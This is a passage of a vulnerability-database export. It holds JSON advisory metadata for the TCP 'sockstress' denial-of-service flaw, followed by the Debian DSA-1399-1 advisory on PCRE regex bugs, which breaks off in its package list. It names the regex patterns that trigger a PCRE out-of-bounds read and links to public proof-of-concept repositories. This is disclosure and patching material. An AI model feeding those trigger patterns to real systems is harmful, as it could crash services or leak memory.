          },
          {
            "db": "PACKETSTORM",
            "id": "81054",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#723308"
          },
          {
            "db": "VULHUB",
            "id": "VHN-34734"
          },
          {
            "db": "VULMON",
            "id": "CVE-2008-4609"
          },
          {
            "db": "BID",
            "id": "31545"
          },
          {
            "db": "PACKETSTORM",
            "id": "81054"
          },
          {
            "db": "PACKETSTORM",
            "id": "82772"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200810-307"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002090"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-4609"
          }
        ]
      },
      "id": "VAR-200810-0010",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-34734"
          }
        ],
        "trust": 0.7284717799999999
      },
      "last_update_date": "2026-03-09T22:39:06.400000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "sk42723",
            "trust": 0.8,
            "url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_dogoviewsolutiondetails=\u0026solutionid=sk42723"
          },
          {
            "title": "cisco-sa-20090908-tcp24",
            "trust": 0.8,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20090908-tcp24.shtml"
          },
          {
            "title": "20091009",
            "trust": 0.8,
            "url": "http://www.furukawa.co.jp/fitelnet/topic/vulnera_20091009.html"
          },
          {
            "title": "MS09-048",
            "trust": 0.8,
            "url": "http://www.microsoft.com/technet/security/bulletin/MS09-048.mspx"
          },
          {
            "title": "NV09-014",
            "trust": 0.8,
            "url": "http://www.nec.co.jp/security-info/secinfo/nv09-014.html"
          },
          {
            "title": "Text Form of Oracle Critical Patch Update - July 2012 Risk Matrices",
            "trust": 0.8,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujul2012verbose-392736.html"
          },
          {
            "title": "Oracle Critical Patch Update Advisory - July 2012",
            "trust": 0.8,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html"
          },
          {
            "title": "TCP\u306e\u5b9f\u88c5\u306b\u304a\u3051\u308b\u30b5\u30fc\u30d3\u30b9\u904b\u7528\u59a8\u5bb3(DoS)\u306e\u8106\u5f31\u6027\u306b\u3064\u3044\u3066",
            "trust": 0.8,
            "url": "http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/VU943657.html"
          },
          {
            "title": "SA41",
            "trust": 0.8,
            "url": "https://kb.bluecoat.com/index?page=content\u0026id=SA41"
          },
          {
            "title": "July 2012 Critical Patch Update Released",
            "trust": 0.8,
            "url": "https://blogs.oracle.com/security/entry/july_2012_critical_patch_update"
          },
          {
            "title": "TCP\u30bb\u30c3\u30b7\u30e7\u30f3\u51e6\u7406\u306b\u95a2\u3059\u308b\u8106\u5f31\u6027",
            "trust": 0.8,
            "url": "http://www.seil.jp/seilseries/security/2009/a00667.php"
          },
          {
            "title": "267088",
            "trust": 0.8,
            "url": "http://jp.sunsolve.sun.com/search/document.do?assetkey=1-66-267088-1"
          },
          {
            "title": "MS09-048",
            "trust": 0.8,
            "url": "http://www.microsoft.com/japan/technet/security/bulletin/ms09-048.mspx"
          },
          {
            "title": "MS09-048e",
            "trust": 0.8,
            "url": "http://www.microsoft.com/japan/security/bulletins/MS09-048e.mspx"
          },
          {
            "title": "JVNVU#943657",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/vulnerabilities/vu943657.html"
          },
          {
            "title": "TA09-251A",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/vulnerabilities/ta09-251a.html"
          },
          {
            "title": "Symantec Security Advisories: SA38: Blue Coat ProxyAV Advisory on Sockstress TCP Attacks",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=fb80a5c8f4ca8d75f9df074d6d82e182"
          },
          {
            "title": "Cisco: TCP State Manipulation Denial of Service Vulnerabilities in Multiple Cisco Products",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20090908-tcp24"
          },
          {
            "title": "Symantec Security Advisories: SA41 : Blue Coat ProxySG Advisory on Sockstress TCP Attacks (CVE-2008-4609)",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=d8370cc1d406e0cbe214c88e6d3d62d7"
          },
          {
            "title": "Symantec Security Advisories: SA34 : Blue Coat iShared Advisory on Sockstress TCP Attacks (CVE-2008-4609)",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=85b57218eec77ee0396becd56404d8f1"
          },
          {
            "title": "Symantec Security Advisories: SA35 : Blue Coat Director Advisory on Sockstress TCP Attacks",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=7d4c01e5a8411a8e49f47e52a356544c"
          },
          {
            "title": "Symantec Security Advisories: SA39 : Blue Coat PacketShaper Advisory on Sockstress TCP Attacks",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=1ace87e00398301b8248ba77512ee922"
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/Live-Hack-CVE/CVE-2008-4609 "
          },
          {
            "title": "sockstress",
            "trust": 0.1,
            "url": "https://github.com/marcelki/sockstress "
          },
          {
            "title": "awesome-network-stuff",
            "trust": 0.1,
            "url": "https://github.com/alphaSeclab/awesome-network-stuff "
          },
          {
            "title": "awesome-network-stuff",
            "trust": 0.1,
            "url": "https://github.com/aniksarakash/awesome-network-stuff "
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/CVEDB/PoC-List "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2008-4609"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002090"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-16",
            "trust": 1.9
          },
          {
            "problemtype": "NVD-CWE-noinfo",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-noinfo",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-34734"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002090"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-4609"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 3.7,
            "url": "https://www.cert.fi/haavoittuvuudet/2008/tcp-vulnerabilities.html"
          },
          {
            "trust": 2.6,
            "url": "http://www.cpni.gov.uk/docs/tn-03-09-security-assessment-tcp.pdf"
          },
          {
            "trust": 2.6,
            "url": "http://www.us-cert.gov/cas/techalerts/ta09-251a.html"
          },
          {
            "trust": 2.1,
            "url": "http://blog.robertlee.name/2008/10/conjecture-speculation.html"
          },
          {
            "trust": 1.8,
            "url": "http://www.cisco.com/en/us/products/products_security_response09186a0080a15120.html"
          },
          {
            "trust": 1.8,
            "url": "http://www.cisco.com/en/us/products/products_security_advisory09186a0080af511d.shtml"
          },
          {
            "trust": 1.8,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html"
          },
          {
            "trust": 1.8,
            "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2013:150"
          },
          {
            "trust": 1.8,
            "url": "http://insecure.org/stf/tcp-dos-attack-explained.html"
          },
          {
            "trust": 1.8,
            "url": "http://searchsecurity.techtarget.com.au/articles/27154-tcp-is-fundamentally-borked"
          },
          {
            "trust": 1.8,
            "url": "http://www.outpost24.com/news/news-2008-10-02.html"
          },
          {
            "trust": 1.8,
            "url": "http://lists.immunitysec.com/pipermail/dailydave/2008-october/005360.html"
          },
          {
            "trust": 1.8,
            "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-048"
          },
          {
            "trust": 1.8,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a6340"
          },
          {
            "trust": 1.7,
            "url": "http://marc.info/?l=bugtraq\u0026m=125856010926699\u0026w=2"
          },
          {
            "trust": 1.6,
            "url": "http://tools.ietf.org/html/draft-ananth-tcpm-persist-01"
          },
          {
            "trust": 1.6,
            "url": "http://www.securityfocus.com/archive/1/507953"
          },
          {
            "trust": 1.2,
            "url": "http://www.microsoft.com/technet/security/bulletin/ms09-048.mspx"
          },
          {
            "trust": 1.2,
            "url": "http://www.kb.cert.org/vuls/id/723308"
          },
          {
            "trust": 1.1,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-267088-1"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/rfc1122#page-92"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/draft-mahesh-persist-timeout-02"
          },
          {
            "trust": 0.8,
            "url": "http://shlang.com/netkill/"
          },
          {
            "trust": 0.8,
            "url": "http://www.netasq.com/en/threats/sockstress.php"
          },
          {
            "trust": 0.8,
            "url": "http://www.phrack.org/issues.html?issue=66\u0026id=9#article"
          },
          {
            "trust": 0.8,
            "url": "http://isc.sans.org/diary.html?storyid=5104"
          },
          {
            "trust": 0.8,
            "url": "http://www.t2.fi/2008/08/27/jack-c-louis-and-robert-e-lee-to-talk-about-new-dos-attack-vectors/"
          },
          {
            "trust": 0.8,
            "url": "http://www.darkreading.com/blog.asp?blog_sectionid=403\u0026doc_id=164939\u0026wt.svl=tease2_2"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/mail-archive/web/tcpm/current/msg04040.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/mail-archive/web/tcpm/current/msg03826.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/mail-archive/web/tcpm/current/msg03503.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/mail-archive/web/tcpm/current/msg02870.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/mail-archive/web/tcpm/current/msg02557.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/mail-archive/web/tcpm/current/msg02189.html"
          },
          {
            "trust": 0.8,
            "url": "http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.31.y.git;a=blob;f=net/ipv4/tcp_timer.c;h=b144a26359bcf34a4b0606e171f97dc709afdfbb;hb=120f68c426e746771e8c09736c0f753822ff3f52#l233"
          },
          {
            "trust": 0.8,
            "url": "http://sla.ckers.org/forum/read.php?14,27324"
          },
          {
            "trust": 0.8,
            "url": "http://www.checkpoint.com/defense/advisories/public/announcement/090809-tcpip-dos-sockstress.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/archive/1/archive/1/506331/100/0/"
          },
          {
            "trust": 0.8,
            "url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=\u0026solutionid=sk42725"
          },
          {
            "trust": 0.8,
            "url": "http://kbase.redhat.com/faq/docs/doc-21623"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-4609"
          },
          {
            "trust": 0.8,
            "url": "http://www.cpni.gov.uk/products/technicalnotes/feb-09-security-assessment-tcp.aspx"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/rfc793"
          },
          {
            "trust": 0.8,
            "url": "http://www.ipa.go.jp/security/vuln/vuln_tcpip.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.jpcert.or.jp/at/2009/at090019.txt"
          },
          {
            "trust": 0.8,
            "url": "http://www.jpcert.or.jp/at/2009/at090018.txt"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu943657/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnta09-251a/"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/tr/jvntr-2009-22"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-4609"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/36802"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/37044/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/36597"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/36603"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/36602"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/31545"
          },
          {
            "trust": 0.8,
            "url": "http://www.us-cert.gov/cas/alerts/sa09-251a.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.vupen.com/english/advisories/2009/2567"
          },
          {
            "trust": 0.8,
            "url": "http://www.vupen.com/english/advisories/2009/2954"
          },
          {
            "trust": 0.8,
            "url": "http://www.cyberpolice.go.jp/#topics"
          },
          {
            "trust": 0.3,
            "url": "http://blogs.technet.com/srd/archive/2009/09/08/assessing-the-risk-of-the-september-critical-security-bulletins.aspx"
          },
          {
            "trust": 0.3,
            "url": "http://blogs.technet.com/srd/archive/2009/09/08/ms09-048-tcp-ip-vulnerabilities.aspx"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/504375"
          },
          {
            "trust": 0.3,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026documentoid=971633\u0026poid="
          },
          {
            "trust": 0.3,
            "url": "http://www.rtpro.yamaha.co.jp/rt/faq/security/vu943657.html"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/css/p8/documents/100065311"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/css/p8/documents/100065799"
          },
          {
            "trust": 0.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20090908-tcp24.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-sr-20081017-tcp.shtml"
          },
          {
            "trust": 0.3,
            "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=kb66963"
          },
          {
            "trust": 0.3,
            "url": "http://support.citrix.com/article/ctx123649"
          },
          {
            "trust": 0.3,
            "url": "http://www11.itrc.hp.com/service/cki/docdisplay.do?doclocale=en\u0026docid=emr_na-c01923093-1"
          },
          {
            "trust": 0.3,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026id=962027"
          },
          {
            "trust": 0.3,
            "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa36"
          },
          {
            "trust": 0.3,
            "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa37"
          },
          {
            "trust": 0.3,
            "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa35"
          },
          {
            "trust": 0.3,
            "url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=\u0026solutionid=sk42723"
          },
          {
            "trust": 0.3,
            "url": "https://support.f5.com/kb/en-us/solutions/public/10000/500/sol10509.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.stonesoft.com/en/support/security_advisories/2009_17_09.html"
          },
          {
            "trust": 0.1,
            "url": "http://marc.info/?l=bugtraq\u0026amp;m=125856010926699\u0026amp;w=2"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/16.html"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/.html"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/live-hack-cve/cve-2008-4609"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/marcelki/sockstress"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20090908-tcp24"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/secunia_security_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/business_solutions/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/36597/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/about_secunia_advisories/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-4609"
          },
          {
            "trust": 0.1,
            "url": "http://www.itrc.hp.com/service/cki/secbullarchive.do"
          },
          {
            "trust": 0.1,
            "url": "http://www.hp.com"
          },
          {
            "trust": 0.1,
            "url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng\u0026jumpid=in_sc-gen__driveritrc\u0026topiccode=itrc"
          },
          {
            "trust": 0.1,
            "url": "http://h30046.www3.hp.com/subsignin.php"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#723308"
          },
          {
            "db": "VULHUB",
            "id": "VHN-34734"
          },
          {
            "db": "VULMON",
            "id": "CVE-2008-4609"
          },
          {
            "db": "BID",
            "id": "31545"
          },
          {
            "db": "PACKETSTORM",
            "id": "81054"
          },
          {
            "db": "PACKETSTORM",
            "id": "82772"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200810-307"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002090"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-4609"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#723308",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-34734",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2008-4609",
            "ident": null
          },
          {
            "db": "BID",
            "id": "31545",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "81054",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "82772",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200810-307",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2009-002090",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2008-4609",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2009-11-23T00:00:00",
            "db": "CERT/CC",
            "id": "VU#723308",
            "ident": null
          },
          {
            "date": "2008-10-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-34734",
            "ident": null
          },
          {
            "date": "2008-10-20T00:00:00",
            "db": "VULMON",
            "id": "CVE-2008-4609",
            "ident": null
          },
          {
            "date": "2008-10-02T00:00:00",
            "db": "BID",
            "id": "31545",
            "ident": null
          },
          {
            "date": "2009-09-09T16:34:28",
            "db": "PACKETSTORM",
            "id": "81054",
            "ident": null
          },
          {
            "date": "2009-11-18T16:25:02",
            "db": "PACKETSTORM",
            "id": "82772",
            "ident": null
          },
          {
            "date": "2008-10-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200810-307",
            "ident": null
          },
          {
            "date": "2009-10-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2009-002090",
            "ident": null
          },
          {
            "date": "2008-10-20T17:59:26.163000",
            "db": "NVD",
            "id": "CVE-2008-4609",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2013-02-13T00:00:00",
            "db": "CERT/CC",
            "id": "VU#723308",
            "ident": null
          },
          {
            "date": "2022-12-14T00:00:00",
            "db": "VULHUB",
            "id": "VHN-34734",
            "ident": null
          },
          {
            "date": "2022-12-14T00:00:00",
            "db": "VULMON",
            "id": "CVE-2008-4609",
            "ident": null
          },
          {
            "date": "2012-07-30T20:21:00",
            "db": "BID",
            "id": "31545",
            "ident": null
          },
          {
            "date": "2019-05-05T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200810-307",
            "ident": null
          },
          {
            "date": "2012-07-20T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2009-002090",
            "ident": null
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2008-4609",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200810-307"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "TCP may keep its offered receive window closed indefinitely (RFC 1122)",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#723308"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "configuration error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200810-307"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200711-0560

    Vulnerability from variot - Updated: 2026-03-09 22:23

    Perl-Compatible Regular Expression (PCRE) library before 7.3 backtracks too far when matching certain input bytes against some regex patterns in non-UTF-8 mode, which allows context-dependent attackers to obtain sensitive information or cause a denial of service (crash), as demonstrated by the "\X?\d" and "\P{L}?\d" patterns. Perl-Compatible Regular Expression (PCRE) The library contains UTF-8 When processing regular expression strings in modes other than, important information is leaked or service operation is interrupted because it is read in excess from the beginning. (DoS) There is a vulnerability that becomes a condition.“\X?\d” and “\P{L}?\d” Format regular expression UTF-8 When used in other modes, important information is taken or service operation is interrupted (DoS) There is a possibility of being put into a state. PCRE regular-expression library is prone to multiple security vulnerabilities. Attackers can exploit these issues to execute arbitrary code, cause denial-of-service conditions, or launch other attacks in the context of the application using the affected library. PCRE (Perl Compatible Regular Expressions) is an open source regular expression library written in C language developed by software developer Philip Hazel. There is an information leakage vulnerability in pcre's method of processing certain malformed regular expressions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


    Debian Security Advisory DSA-1399-1 security@debian.org http://www.debian.org/security/ Florian Weimer November 5th, 2007 http://www.debian.org/security/faq


    Package : pcre3 Vulnerability : several Problem type : local (remote) Debian-specific: no CVE Ids : CVE-2007-1659 CVE-2007-1660 CVE-2007-1661 CVE-2007-1662 CVE-2007-4766 CVE-2007-4767 CVE-2007-4768

    Tavis Ormandy of the Google Security Team has discovered several security issues in PCRE, the Perl-Compatible Regular Expression library, which potentially allow attackers to execute arbitrary code by compiling specially crafted regular expressions.

    Version 7.0 of the PCRE library featured a major rewrite of the regular expression compiler, and it was deemed infeasible to backport the security fixes in version 7.3 to the versions in Debian's stable and oldstable distributions (6.7 and 4.5, respectively). Therefore, this update contains version 7.3, with special patches to improve the compatibility with the older versions. As a result, extra care is necessary when applying this update.

    The Common Vulnerabilities and Exposures project identifies the following problems:

    CVE-2007-1659

    Unmatched \Q\E sequences with orphan \E codes can cause the compiled
    regex to become desynchronized, resulting in corrupt bytecode that may
    result in multiple exploitable conditions.
    

    CVE-2007-1660

    Multiple forms of character class had their sizes miscalculated on
    initial passes, resulting in too little memory being allocated.
    

    CVE-2007-1661

    Multiple patterns of the form  \X?\d or \P{L}?\d in non-UTF-8 mode
    could backtrack before the start of the string, possibly leaking
    information from the address space, or causing a crash by reading out
    of bounds.
    

    CVE-2007-1662

    A number of routines can be fooled into reading past the end of an
    string looking for unmatched parentheses or brackets, resulting in a
    denial of service.
    

    CVE-2007-4766

    Multiple integer overflows in the processing of escape sequences could
    result in heap overflows or out of bounds reads/writes.
    

    CVE-2007-4767

    Multiple infinite loops and heap overflows were disovered in the
    handling of \P and \P{x} sequences, where the length of these
    non-standard operations was mishandled.
    

    CVE-2007-4768

    Character classes containing a lone unicode sequence were incorrectly
    optimised, resulting in a heap overflow.
    

    For the stable distribution (etch), these problems have been fixed in version 6.7+7.4-2.

    For the old stable distribution (sarge), these problems have been fixed in version 4.5+7.4-1.

    For the unstable distribution (sid), these problems have been fixed in version 7.3-1.

    Upgrade instructions


    wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

    If you are using the apt-get package manager, use the line for sources.list as given below:

    apt-get update will update the internal database apt-get upgrade will install corrected packages

    You may use an automated update by adding the resources from the footer to the proper configuration.

    Debian GNU/Linux 3.1 alias sarge


    Source archives:

    http://security.debian.org/pool/updates/main/p/pcre3/pcre3_4.5+7.4-1.dsc Size/MD5 checksum: 883 c0a3ccb50369530f99e2316800fc8235 http://security.debian.org/pool/updates/main/p/pcre3/pcre3_4.5+7.4-1.diff.gz Size/MD5 checksum: 95042 afc6a74beeef8cf5d176f67c69d24134 http://security.debian.org/pool/updates/main/p/pcre3/pcre3_4.5+7.4.orig.tar.gz Size/MD5 checksum: 1106897 de886b22cddc8eaf620a421d3041ee0b

    Architecture independent packages:

    http://security.debian.org/pool/updates/main/p/pcre3/pgrep_4.5+7.4-1_all.deb Size/MD5 checksum: 762 6eaceaa90e829e7cdfa06fb998bb8233

    alpha architecture (DEC Alpha)

    http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_alpha.deb Size/MD5 checksum: 218176 350cc1e53f59d700e499d1a748f8cbd8 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_alpha.deb Size/MD5 checksum: 191076 fb92cd7ca9ef7716e60160acea9d8074 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_alpha.deb Size/MD5 checksum: 21342 27b99f0f6f80046b565fb2ee4521bc9f

    arm architecture (ARM)

    http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_arm.deb Size/MD5 checksum: 209516 854273bab63857eaf33161db3c51fafb http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_arm.deb Size/MD5 checksum: 19404 dceedf5791eb956b0c17d981fde97d60 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_arm.deb Size/MD5 checksum: 183560 a2571d9ddd20dea2b8c02c6f82aa2e04

    hppa architecture (HP PA RISC)

    http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_hppa.deb Size/MD5 checksum: 208360 30d77147bb19d09c3022892f3c56799b http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_hppa.deb Size/MD5 checksum: 21022 c7a12598a8d72e3a1920ddf59d41c05b http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_hppa.deb Size/MD5 checksum: 190744 14a88e3a22a4513b33fd190fa985c459

    i386 architecture (Intel ia32)

    http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_i386.deb Size/MD5 checksum: 206134 433a36e096973d372994b3652504707f http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_i386.deb Size/MD5 checksum: 183984 aa21622f099330f60614304832e4c7f5 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_i386.deb Size/MD5 checksum: 19034 d9af02efce9d0a499a0ab175a66a22ee

    ia64 architecture (Intel ia64)

    http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_ia64.deb Size/MD5 checksum: 228448 8185ea0adb742d386eafbedb1a6150fa http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_ia64.deb Size/MD5 checksum: 24758 78fe5bff205289853471e48df1c9313f http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_ia64.deb Size/MD5 checksum: 211152 cea2a6ce5b965832743c0934147b9dc6

    m68k architecture (Motorola Mc680x0)

    http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_m68k.deb Size/MD5 checksum: 172344 e36b664fd639e7da09087e48e3015e1c http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_m68k.deb Size/MD5 checksum: 17974 e4cf7a1f5c4e877e6303de0f1713bf37 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_m68k.deb Size/MD5 checksum: 194320 ec7a340511218566fbf8fd24107c8db4

    mips architecture (MIPS (Big Endian))

    http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_mips.deb Size/MD5 checksum: 181276 c6d1b927b0c1d76ef0f8c9aab01cc46d http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_mips.deb Size/MD5 checksum: 208676 0cac847f1c0aac143dc4221e94591fa8 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_mips.deb Size/MD5 checksum: 20088 746734d3c58c1182f6e789e90421edab

    mipsel architecture (MIPS (Little Endian))

    http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_mipsel.deb Size/MD5 checksum: 20236 cd7c9b57558c3f02336ef1a9336defd1 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_mipsel.deb Size/MD5 checksum: 207652 676e7376ae34519aeffca833fe148920 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_mipsel.deb Size/MD5 checksum: 181050 dfc9c14755d8cd1f6eda5869fc0cb7aa

    powerpc architecture (PowerPC)

    http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-1_powerpc.deb Size/MD5 checksum: 185100 9f43e18ab5ca3fb66955c6e6c2ea8a66 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-1_powerpc.deb Size/MD5 checksum: 21244 d38c9a2953a360fee4985b16faf90356 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-1_powerpc.deb Size/MD5 checksum: 213414 d951d611b6db1843939c258b9ae75b4d

    s390 architecture (IBM S/390)

